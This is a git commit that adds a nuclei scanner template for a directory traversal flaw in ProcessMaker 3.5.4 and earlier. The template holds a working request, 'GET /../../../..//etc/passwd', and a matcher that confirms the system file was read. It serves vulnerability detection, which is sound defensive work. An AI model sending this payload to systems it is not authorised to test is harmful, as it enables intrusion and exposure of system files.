Merge pull request #2527 from projectdiscovery/processmaker-lfi

Create processmaker-lfi.yaml
patch-1
Prince Chaddha 2021-08-31 14:25:33 +05:30 committed by GitHub
commit 208d137e2a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: processmaker-lfi
info:
name: ProcessMaker <= 3.5.4 Directory Traversal
author: KrE80r
severity: high
reference:
- https://www.exploit-db.com/exploits/50229
- https://www.processmaker.com
tags: processmaker,lfi
requests:
- raw:
- |
GET /../../../..//etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200